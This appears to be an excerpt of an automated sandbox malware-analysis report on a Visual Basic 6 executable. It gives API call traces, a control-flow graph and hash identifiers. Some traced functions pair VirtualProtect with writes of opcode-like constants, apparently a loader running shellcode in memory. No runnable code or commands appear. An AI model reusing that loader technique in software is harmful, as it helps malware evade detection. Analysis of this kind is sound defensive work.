                                                                      • Part of subcall function 0054EEC1: __vbaHresultCheckObj.MSVBVM60(00000000,?,0040AC14,0000000C), ref: 0054F02A
                                                                      • Part of subcall function 0054EEC1: __vbaAryUnlock.MSVBVM60(?), ref: 0054F042
                                                                      • Part of subcall function 0054EEC1: __vbaVarMove.MSVBVM60(?,00006011,?), ref: 0054F068
                                                                    • __vbaStrVarMove.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 0054D12C
                                                                    • __vbaStrMove.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 0054D136
                                                                    • __vbaStrCopy.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 0054D146
                                                                    • __vbaFreeStr.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 0054D14E
                                                                    • __vbaFreeObj.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 0054D156
                                                                    • __vbaFreeVar.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 0054D15E
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040AC14,0000000C), ref: 0054D196
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040AC14,0000000C), ref: 0054D1DD
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040AC14,0000000C), ref: 0054D224
                                                                    • __vbaObjSetAddref.MSVBVM60(?,?), ref: 0054D23F
                                                                    • __vbaStrMove.MSVBVM60(00000000,?,?), ref: 0054D24F
                                                                    • __vbaStrCopy.MSVBVM60(00000000,?,?), ref: 0054D25F
                                                                    • __vbaFreeStr.MSVBVM60(00000000,?,?), ref: 0054D267
                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,?), ref: 0054D26F
                                                                    • __vbaObjSetAddref.MSVBVM60(?,?,00000000,?,?), ref: 0054D27B
                                                                    • __vbaStrMove.MSVBVM60(00000000,?,?,00000000,?,?), ref: 0054D28B
                                                                    • __vbaStrCopy.MSVBVM60(00000000,?,?,00000000,?,?), ref: 0054D29B
                                                                    • __vbaFreeStr.MSVBVM60(00000000,?,?,00000000,?,?), ref: 0054D2A3
                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,?,00000000,?,?), ref: 0054D2AB
                                                                    • __vbaObjSetAddref.MSVBVM60(?,?,00000000,?,?,00000000,?,?), ref: 0054D2B7
                                                                    • __vbaStrMove.MSVBVM60(00000000,?,?,00000000,?,?,00000000,?,?), ref: 0054D2C7
                                                                    • __vbaStrCopy.MSVBVM60(00000000,?,?,00000000,?,?,00000000,?,?), ref: 0054D2D7
                                                                    • __vbaFreeStr.MSVBVM60(00000000,?,?,00000000,?,?,00000000,?,?), ref: 0054D2DF
                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,?,00000000,?,?,00000000,?,?), ref: 0054D2E7
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040AC14,0000000C), ref: 0054D31F
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040AC14,0000000C), ref: 0054D366
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040AC14,0000000C), ref: 0054D3AD
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040AC14,0000000C), ref: 0054D3EE
                                                                    • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 0054D418
                                                                    • __vbaAryLock.MSVBVM60(?,?), ref: 0054D427
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040AC14,0000000C), ref: 0054D467
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040AC14,0000000C), ref: 0054D514
                                                                    • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,0FFFFFFF,00000000), ref: 0054D555
                                                                    • __vbaAryLock.MSVBVM60(?,?), ref: 0054D564
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040AC14,0000000C), ref: 0054D5A4
                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 0054D5BC
                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 0054D47F
                                                                      • Part of subcall function 0054E01F: __vbaChkstk.MSVBVM60(?,00401526,?,?,?,0054D5F3,?,00004008,000000FF,?), ref: 0054E03A
                                                                      • Part of subcall function 0054E01F: __vbaVarVargNofree.MSVBVM60(?,?,?,?,00401526,?,?,?,0054D5F3,?,00004008,000000FF,?), ref: 0054E052
                                                                      • Part of subcall function 0054E01F: __vbaStrVarCopy.MSVBVM60(00000000,?,?,?,?,00401526,?,?,?,0054D5F3,?,00004008,000000FF,?), ref: 0054E058
                                                                      • Part of subcall function 0054E01F: __vbaStrMove.MSVBVM60(00000000,?,?,?,?,00401526,?,?,?,0054D5F3,?,00004008,000000FF,?), ref: 0054E062
                                                                      • Part of subcall function 0054E01F: __vbaNew2.MSVBVM60(004082A0,00000000,00000000,?,?,?,?,00401526,?,?,?,0054D5F3,?,00004008,000000FF,?), ref: 0054E095
                                                                      • Part of subcall function 0054E01F: __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A838,0000001C,?,?,?,?,00401526,?,?,?,0054D5F3,?,00004008,000000FF), ref: 0054E0D7
                                                                      • Part of subcall function 0054E01F: __vbaStrToAnsi.MSVBVM60(?,00004008,00000018,00000000,?,?,?,?,00401526,?,?,?,0054D5F3,?,00004008,000000FF), ref: 0054E0F0
                                                                      • Part of subcall function 0054E01F: __vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,00004008,00000018,00000000,?,?,?,?,00401526,?,?,?,0054D5F3), ref: 0054E104
                                                                      • Part of subcall function 0054E01F: __vbaFreeStrList.MSVBVM60(00000002,00004008,?,?,00000000,00000000,?,00004008,00000018,00000000,?,?,?,?,00401526), ref: 0054E122
                                                                      • Part of subcall function 0054E01F: __vbaNew2.MSVBVM60(004082A0,00000000), ref: 0054E145
                                                                    • __vbaAryUnlock.MSVBVM60(?,0054DCB9,?,00000000,?,?,?,?,?,?,?), ref: 0054DC85
                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,?,0054DCB9,?,00000000,?,?,?,?,?,?,?), ref: 0054DC90
                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,?,0054DCB9,?,00000000,?,?,?,?,?,?,?), ref: 0054DC98
                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,?,0054DCB9,?,00000000,?,?,?,?,?,?,?), ref: 0054DCA0
                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,00000000,?,?,0054DCB9,?,00000000,?,?,?,?,?,?,?), ref: 0054DCAB
                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,00000000,?,?,0054DCB9,?,00000000,?,?,?,?,?,?,?), ref: 0054DCB3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$Free$CheckHresult$Move$Addref$Copy$Unlock$ChkstkLockRedim$DestructNew2$AnsiBoolErrorListNofreeNullSystemVarg
                                                                    • String ID:
                                                                    • API String ID: 734032644-0
                                                                    • Opcode ID: 92e043a3781038a5bfba59b0bd5da739a0a985a6ae3399c4668023924b945dee
                                                                    • Instruction ID: 9456bab0da458fe4002216eaa59ded257b21e4b72fd5d97ff4916e9573decfa9
                                                                    • Opcode Fuzzy Hash: 92e043a3781038a5bfba59b0bd5da739a0a985a6ae3399c4668023924b945dee
                                                                    • Instruction Fuzzy Hash: 4A92C171D00218AFDF10EBA5CC85FEDBBB9BB08308F14846AF115B71A2DB7999548F64

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 207 5c75a5-5c75db __vbaChkstk 208 5c75dd-5c75f6 __vbaNew2 207->208 209 5c75f8 207->209 210 5c7602-5c7614 208->210 209->210 211 5c7616-5c762f __vbaNew2 210->211 212 5c7631 210->212 213 5c763b-5c7661 __vbaObjSetAddref 211->213 212->213 215 5c767d 213->215 216 5c7663-5c767b __vbaHresultCheckObj 213->216 217 5c7684-5c769c __vbaFreeObj call 54c9d2 215->217 216->217 220 5c769e 217->220 221 5c76a3-5c76b0 call 56e36c 217->221 222 5c7ffc-5c804a __vbaAryUnlock 220->222 226 5c76b7-5c7769 __vbaAryLock #644 __vbaAryUnlock call 54b161 call 54b3eb __vbaObjSet __vbaObjSetAddref __vbaFreeObj __vbaObjSetAddref #644 __vbaFreeObj 221->226 227 5c76b2 221->227 232 5c776d 226->232 233 5c776b-5c77b0 __vbaObjSetAddref call 54d027 __vbaFreeObj 226->233 227->222 232->222 237 5c77b7-5c77ea 233->237 238 5c77b2 233->238 239 5c77ec-5c77f3 237->239 240 5c7800-5c780c 237->240 238->222 241 5c780e-5c781a 239->241 242 5c77f5-5c77fc 239->242 243 5c7828-5c784b 240->243 241->243 244 5c781c-5c7821 242->244 245 5c77fe 242->245 246 5c784d-5c7890 call 5c805a __vbaFreeVar 243->246 247 5c7895-5c78a3 243->247 244->243 245->243 246->247 248 5c790d-5c791b 247->248 249 5c78a5-5c78b7 call 54ce6e 247->249 252 5c797d-5c798b 248->252 253 5c791d-5c7927 call 54e474 248->253 249->248 259 5c78b9-5c7908 call 5c805a __vbaFreeVar call 40aa0c __vbaSetSystemError 249->259 256 5c798d call 54c72b 252->256 257 5c7992-5c79a0 252->257 253->252 266 5c7929-5c7978 call 5c805a __vbaFreeVar call 40aa0c __vbaSetSystemError 253->266 256->257 261 5c7a02-5c7a11 257->261 262 5c79a2-5c79ac call 54ce0f 257->262 259->248 267 5c7a7b-5c7a8a 261->267 268 5c7a13-5c7a25 call 54ce6e 261->268 262->261 279 5c79ae-5c79fd call 5c805a __vbaFreeVar call 40aa0c __vbaSetSystemError 262->279 266->252 272 5c7aec-5c7afb 267->272 273 5c7a8c-5c7a96 call 5c81a6 267->273 268->267 283 5c7a27-5c7a76 call 5c805a __vbaFreeVar call 40aa0c __vbaSetSystemError 268->283 276 5c7afd-5c7b0f call 54ce6e 272->276 277 5c7b65-5c7b74 272->277 273->272 297 5c7a98-5c7ae7 call 5c805a __vbaFreeVar call 40aa0c __vbaSetSystemError 273->297 276->277 299 5c7b11-5c7b60 call 5c805a __vbaFreeVar call 40aa0c __vbaSetSystemError 276->299 286 5c7bd6-5c7be5 277->286 287 5c7b76-5c7b80 call 54e6b4 277->287 279->261 283->267 293 5c7c47-5c7c91 286->293 294 5c7be7-5c7bf1 call 54cd59 286->294 287->286 310 5c7b82-5c7bd1 call 5c805a __vbaFreeVar call 40aa0c __vbaSetSystemError 287->310 308 5c7e96-5c7ea0 293->308 309 5c7c97-5c7ca8 293->309 294->293 315 5c7bf3-5c7c42 call 5c805a __vbaFreeVar call 40aa0c __vbaSetSystemError 294->315 297->272 299->277 316 5c7ea6-5c7ec9 308->316 317 5c7fb1-5c7ff7 #644 call 54b152 #644 call 54b152 308->317 318 5c7cae-5c7e8c __vbaAryLock call 54cef9 __vbaStrMove __vbaAryLock __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat call 54c8b0 __vbaAryUnlock __vbaFreeStrList __vbaFreeVar call 54cef9 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaChkstk call 54b7c7 __vbaStrVarVal #644 call 40a94c __vbaSetSystemError __vbaFreeStrList __vbaFreeVarList __vbaAryUnlock 309->318 319 5c7e91 309->319 310->286 315->293 325 5c7f3f-5c7f9b call 40a98c __vbaSetSystemError __vbaAryLock call 54cb74 316->325 326 5c7ecb-5c7f3d call 40a98c __vbaSetSystemError __vbaAryLock call 54cb74 __vbaAryUnlock __vbaFreeVar 316->326 317->222 318->319 319->308 349 5c7fa0-5c7fac __vbaAryUnlock __vbaFreeVar 325->349 326->317 349->317
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(00000000,00401526,?,?,?,005C7585), ref: 005C75C2
                                                                    • __vbaNew2.MSVBVM60(0040B6BC,005C9B40,?,0000000A,?,00000000,00401526,?,?,?,005C7585), ref: 005C75E7
                                                                    • __vbaNew2.MSVBVM60(00408968,005C9314), ref: 005C7620
                                                                    • __vbaObjSetAddref.MSVBVM60(00401526,?), ref: 005C7647
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B6AC,00000010), ref: 005C7670
                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,0040B6AC,00000010), ref: 005C7687
                                                                    • __vbaAryLock.MSVBVM60(?,005C9320), ref: 005C76C2
                                                                    • #644.MSVBVM60(?,?,005C9320), ref: 005C76D8
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,005C9320), ref: 005C76E4
                                                                    • __vbaObjSet.MSVBVM60(00401526,00000000,?,?,00000000,?,?,?,005C9320), ref: 005C7715
                                                                    • __vbaObjSetAddref.MSVBVM60(005C931C,00000000,00401526,00000000,?,?,00000000,?,?,?,005C9320), ref: 005C7724
                                                                    • __vbaFreeObj.MSVBVM60(005C931C,00000000,00401526,00000000,?,?,00000000,?,?,?,005C9320), ref: 005C772C
                                                                    • __vbaObjSetAddref.MSVBVM60(00401526,00000000,005C931C,00000000,00401526,00000000,?,?,00000000,?,?,?,005C9320), ref: 005C773D
                                                                    • #644.MSVBVM60(00000000,00401526,00000000,005C931C,00000000,00401526,00000000,?,?,00000000,?,?,?,005C9320), ref: 005C7743
                                                                    • __vbaFreeObj.MSVBVM60(00000000,00401526,00000000,005C931C,00000000,00401526,00000000,?,?,00000000,?,?,?,005C9320), ref: 005C7751
                                                                    • __vbaObjSetAddref.MSVBVM60(00401526,00000000,005C9318,005C92E8,00000000,00401526,00000000,005C931C,00000000,00401526,00000000,?,?,00000000,?,?), ref: 005C7790
                                                                    • __vbaFreeObj.MSVBVM60(00000000,00401526,00000000,005C9318,005C92E8,00000000,00401526,00000000,005C931C,00000000,00401526,00000000,?,?,00000000,?), ref: 005C77A5
                                                                    • __vbaAryUnlock.MSVBVM60(?,005C804B,00000000,00401526,00000000,005C931C,00000000,00401526,00000000,?,?,00000000,?,?,?,005C9320), ref: 005C8045
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$AddrefFree$#644New2Unlock$CheckChkstkHresultLock
                                                                    • String ID: :U\
                                                                    • API String ID: 452095399-1940655514
                                                                    • Opcode ID: 81a153ab3e8a1e9e81adecda5ccee7c54280f2233b8c695c3ba3df23809a098e
                                                                    • Instruction ID: 6536bd0a950bac27b3cd77d99df98d5ec454f35af7d190ff8d9d48df06326c10
                                                                    • Opcode Fuzzy Hash: 81a153ab3e8a1e9e81adecda5ccee7c54280f2233b8c695c3ba3df23809a098e
                                                                    • Instruction Fuzzy Hash: E562E7729002199FDB10EBA9CD86FDDBBB8BF08308F54456AE145FB2A2DB349944CF15

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(00000000,00401526,?,?,?,0054C3FF,?,?,?), ref: 0054F0E4
                                                                    • __vbaRedim.MSVBVM60(00000080,00000004,?,00000003,00000001,0000000F,00000000,?,00000003,?,00000000,00401526,?,?,?,0054C3FF), ref: 0054F109
                                                                    • __vbaNew.MSVBVM60(0040A7CC,0040A7DC), ref: 0054F11B
                                                                    • __vbaObjSet.MSVBVM60(?,00000000,0040A7CC,0040A7DC), ref: 0054F125
                                                                    • __vbaCastObj.MSVBVM60(00000000,?,00000000,0040A7CC,0040A7DC), ref: 0054F12B
                                                                    • __vbaObjSet.MSVBVM60(0040A7CC,00000000,00000000,?,00000000,0040A7CC,0040A7DC), ref: 0054F135
                                                                    • __vbaFreeObj.MSVBVM60(0040A7CC,00000000,00000000,?,00000000,0040A7CC,0040A7DC), ref: 0054F13D
                                                                    • __vbaObjSetAddref.MSVBVM60(00000000,0040A7CC,0040A7CC,00000000,00000000,?,00000000,0040A7CC,0040A7DC), ref: 0054F149
                                                                    • #644.MSVBVM60(00000000,00000000,0040A7CC,0040A7CC,00000000,00000000,?,00000000,0040A7CC,0040A7DC), ref: 0054F14F
                                                                    • __vbaFreeObj.MSVBVM60(00000000,00000000,0040A7CC,0040A7CC,00000000,00000000,?,00000000,0040A7CC,0040A7DC), ref: 0054F15A
                                                                    • #644.MSVBVM60(0040A7DC,00000000,00000000,0040A7CC,0040A7CC,00000000,00000000,?,00000000,0040A7CC,0040A7DC), ref: 0054F163
                                                                    • #644.MSVBVM60(?,0040A7DC,00000000,00000000,0040A7CC,0040A7CC,00000000,00000000,?,00000000,0040A7CC,0040A7DC), ref: 0054F16F
                                                                    • #644.MSVBVM60(0040A7DC,?,0040A7DC,00000000,00000000,0040A7CC,0040A7CC,00000000,00000000,?,00000000,0040A7CC,0040A7DC), ref: 0054F17B
                                                                    • #644.MSVBVM60(0040A7DC,0040A7DC,?,0040A7DC,00000000,00000000,0040A7CC,0040A7CC,00000000,00000000,?,00000000,0040A7CC,0040A7DC), ref: 0054F187
                                                                    • __vbaAryLock.MSVBVM60(?,?,?), ref: 0054F1CB
                                                                    • #644.MSVBVM60(?,?,?,?), ref: 0054F1E3
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,?,?), ref: 0054F1EF
                                                                    • __vbaObjSetAddref.MSVBVM60(00000000,0040A7CC,?), ref: 0054F20F
                                                                    • #644.MSVBVM60(00000000,00000000,0040A7CC,?), ref: 0054F215
                                                                    • __vbaFreeObj.MSVBVM60(00000000,00000000,0040A7CC,?), ref: 0054F220
                                                                    • #644.MSVBVM60(?,00000000,00000000,0040A7CC,?), ref: 0054F229
                                                                    • __vbaAryLock.MSVBVM60(?,?,0040A7DC,00000000,?,00000000,00000000,0040A7CC,?), ref: 0054F23E
                                                                    • #644.MSVBVM60(?,?,?,0040A7DC,00000000,?,00000000,00000000,0040A7CC,?), ref: 0054F255
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,?,0040A7DC,00000000,?,00000000,00000000,0040A7CC,?), ref: 0054F261
                                                                    • #644.MSVBVM60(0040A7DC,?,?,?,?,0040A7DC,00000000,?,00000000,00000000,0040A7CC,?), ref: 0054F270
                                                                    • #644.MSVBVM60(005C92B0,0040A7DC,0040A7DC,0040A7DC,?,?,?,?,0040A7DC,00000000,?,00000000,00000000,0040A7CC,?), ref: 0054F2A9
                                                                    • #644.MSVBVM60(00000040,-0000000C,00000000,005C92B0,0040A7DC,0040A7DC,0040A7DC,?,?,?,?,0040A7DC,00000000,?,00000000,00000000), ref: 0054F2CC
                                                                    • __vbaAryLock.MSVBVM60(?,0040A7DC,-0000000C,00000040,-0000000C,00000000,005C92B0,0040A7DC,0040A7DC,0040A7DC,?,?,?,?,0040A7DC,00000000), ref: 0054F2F7
                                                                    • __vbaStrCat.MSVBVM60(0040A804,0040A7FC,?,00000000,?,0040A7DC,-0000000C,00000040,-0000000C,00000000,005C92B0,0040A7DC,0040A7DC,0040A7DC,?,?), ref: 0054F31C
                                                                    • __vbaStrMove.MSVBVM60(0040A804,0040A7FC,?,00000000,?,0040A7DC,-0000000C,00000040,-0000000C,00000000,005C92B0,0040A7DC,0040A7DC,0040A7DC,?,?), ref: 0054F326
                                                                    • __vbaI4Str.MSVBVM60(00000000,0040A804,0040A7FC,?,00000000,?,0040A7DC,-0000000C,00000040,-0000000C,00000000,005C92B0,0040A7DC,0040A7DC,0040A7DC,?), ref: 0054F32C
                                                                    • VirtualProtect.KERNELBASE(0040A7CC,00000000,00000000,0040A804,0040A7FC,?,00000000,?,0040A7DC,-0000000C,00000040,-0000000C,00000000,005C92B0,0040A7DC,0040A7DC), ref: 0054F33A
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,0040A7CC,0040A7DC,0000002C), ref: 0054F355
                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 0054F367
                                                                    • __vbaFreeStr.MSVBVM60(?), ref: 0054F36F
                                                                    • #644.MSVBVM60(005C92B0,?), ref: 0054F37D
                                                                    • __vbaStrCat.MSVBVM60(0040AF80,0040AF78,005C92B0,?), ref: 0054F38F
                                                                    • __vbaStrMove.MSVBVM60(0040AF80,0040AF78,005C92B0,?), ref: 0054F399
                                                                    • __vbaStrCat.MSVBVM60(0040B194,00000000,0040AF80,0040AF78,005C92B0,?), ref: 0054F3A4
                                                                    • #638.MSVBVM60(00000008,0040B194,00000000,0040AF80,0040AF78,005C92B0,?), ref: 0054F3C1
                                                                    • __vbaFreeStr.MSVBVM60(00000000,00000000,00000008,0040B194,00000000,0040AF80,0040AF78,005C92B0,?), ref: 0054F3D4
                                                                    • __vbaFreeVar.MSVBVM60(00000000,00000000,00000008,0040B194,00000000,0040AF80,0040AF78,005C92B0,?), ref: 0054F3DC
                                                                    • __vbaAryLock.MSVBVM60(?,00000000,00000000,00000000,00000008,0040B194,00000000,0040AF80,0040AF78,005C92B0,?), ref: 0054F41C
                                                                    • #644.MSVBVM60(?,?,00000000,00000000,00000000,00000008,0040B194,00000000,0040AF80,0040AF78,005C92B0,?), ref: 0054F434
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,00000000,00000000,00000000,00000008,0040B194,00000000,0040AF80,0040AF78,005C92B0,?), ref: 0054F440
                                                                    • #644.MSVBVM60(0C2474FF,00000000,00000000,00000000,00000008,0040B194,00000000,0040AF80,0040AF78,005C92B0,?), ref: 0054F465
                                                                    • #644.MSVBVM60(0C2454FF,0040A7DC,0040A7D8,0C2474FF,00000000,00000000,00000000,00000008,0040B194,00000000,0040AF80,0040AF78,005C92B0,?), ref: 0054F487
                                                                    • #644.MSVBVM60(10244C8B,0040A7DC,0040A7D4,0C2454FF,0040A7DC,0040A7D8,0C2474FF,00000000,00000000,00000000,00000008,0040B194,00000000,0040AF80,0040AF78,005C92B0), ref: 0054F4A9
                                                                    • #644.MSVBVM60(2CC20189,0040A7DC,0040A7D0,10244C8B,0040A7DC,0040A7D4,0C2454FF,0040A7DC,0040A7D8,0C2474FF,00000000,00000000,00000000,00000008,0040B194,00000000), ref: 0054F4CB
                                                                    • #644.MSVBVM60(00000000,0040A7DC,0040A7CC,2CC20189,0040A7DC,0040A7D0,10244C8B,0040A7DC,0040A7D4,0C2454FF,0040A7DC,0040A7D8,0C2474FF,00000000,00000000,00000000), ref: 0054F4EA
                                                                    • #644.MSVBVM60(?,0040A7DC,0040A7C8,00000000,0040A7DC,0040A7CC,2CC20189,0040A7DC,0040A7D0,10244C8B,0040A7DC,0040A7D4,0C2454FF,0040A7DC,0040A7D8,0C2474FF), ref: 0054F51C
                                                                    • #644.MSVBVM60(00000000,?,0040A7DC,0040A7C8,00000000,0040A7DC,0040A7CC,2CC20189,0040A7DC,0040A7D0,10244C8B,0040A7DC,0040A7D4,0C2454FF,0040A7DC,0040A7D8), ref: 0054F528
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,0040A7CC,0040A7DC,00000020), ref: 0054F574
                                                                    • __vbaAryLock.MSVBVM60(?,00000000), ref: 0054F5BD
                                                                    • #644.MSVBVM60(?,?,00000000), ref: 0054F5D5
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,00000000), ref: 0054F5E1
                                                                    • #644.MSVBVM60(?,00000000), ref: 0054F5FF
                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,0054F64F,00000000,0040A7DC,?,00000000), ref: 0054F641
                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,0054F64F,00000000,0040A7DC,?,00000000), ref: 0054F649
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$#644$Free$LockUnlock$AddrefCheckHresultMove$#638CastChkstkDestructProtectRedimVirtual
                                                                    • String ID: @
                                                                    • API String ID: 265859740-2766056989
                                                                    • Opcode ID: 613ece9b535810ecb5d2f7c4d494797322ac7e214d0ca1e21d198dd3e06f1673
                                                                    • Instruction ID: b691d540f608e16e27dbed9fe34bd43a82f861531633eec728595e4f847c50fa
                                                                    • Opcode Fuzzy Hash: 613ece9b535810ecb5d2f7c4d494797322ac7e214d0ca1e21d198dd3e06f1673
                                                                    • Instruction Fuzzy Hash: 8002A775D00109AFDF00EFE5CD95EDEBBB9BF08308F14442AE501B7261DB7999158B64

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(00000000,00401526,?,?,?,0054C2B9,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054F7A1
                                                                    • __vbaRedim.MSVBVM60(00000080,00000004,?,00000003,00000001,0000000F,00000000,?,?,?,00000000,00401526,?,?,?,0054C2B9), ref: 0054F7C6
                                                                    • __vbaNew.MSVBVM60(0040A7CC,0040A7DC), ref: 0054F7D8
                                                                    • __vbaObjSet.MSVBVM60(?,00000000,0040A7CC,0040A7DC), ref: 0054F7E2
                                                                    • __vbaCastObj.MSVBVM60(00000000,?,00000000,0040A7CC,0040A7DC), ref: 0054F7E8
                                                                    • __vbaObjSet.MSVBVM60(?,00000000,00000000,?,00000000,0040A7CC,0040A7DC), ref: 0054F7F2
                                                                    • __vbaObjSetAddref.MSVBVM60(005C92AC,00000000,?,00000000,00000000,?,00000000,0040A7CC,0040A7DC), ref: 0054F801
                                                                    • __vbaFreeObjList.MSVBVM60(00000002,?,00000000,005C92AC,00000000,?,00000000,00000000,?,00000000,0040A7CC,0040A7DC), ref: 0054F810
                                                                    • __vbaObjSetAddref.MSVBVM60(?,00000000,00000000,0040A7CC,0040A7DC), ref: 0054F824
                                                                    • #644.MSVBVM60(00000000,?,00000000,00000000,0040A7CC,0040A7DC), ref: 0054F82A
                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,00000000,00000000,0040A7CC,0040A7DC), ref: 0054F835
                                                                    • __vbaAryLock.MSVBVM60(?,?), ref: 0054F87B
                                                                    • #644.MSVBVM60(?,?,?), ref: 0054F893
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,?), ref: 0054F89F
                                                                    • __vbaObjSetAddref.MSVBVM60(00000000,00000000), ref: 0054F8C4
                                                                    • #644.MSVBVM60(00000000,00000000,00000000), ref: 0054F8CA
                                                                    • __vbaFreeObj.MSVBVM60(00000000,00000000,00000000), ref: 0054F8D5
                                                                    • #644.MSVBVM60(0040A7CC,00000000,00000000,00000000), ref: 0054F8DE
                                                                    • __vbaAryLock.MSVBVM60(?,?,00000000,00000000,0040A7CC,00000000,00000000,00000000), ref: 0054F8F3
                                                                    • #644.MSVBVM60(?,?,?,00000000,00000000,0040A7CC,00000000,00000000,00000000), ref: 0054F90A
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,?,00000000,00000000,0040A7CC,00000000,00000000,00000000), ref: 0054F916
                                                                    • #644.MSVBVM60(?,?,?,?,?,00000000,00000000,0040A7CC,00000000,00000000,00000000), ref: 0054F925
                                                                    • __vbaRedim.MSVBVM60(00000080,00000004,0040A7DC,00000003,00000001,00000010,00000000,?,00000000,?,?,?,?,?,00000000,00000000), ref: 0054F963
                                                                    • #644.MSVBVM60(?,?,?,00000000,00000000,00000000,?,00000000,00000000,0040A7CC,0040A7DC), ref: 0054F96F
                                                                    • #644.MSVBVM60(00000040), ref: 0054F990
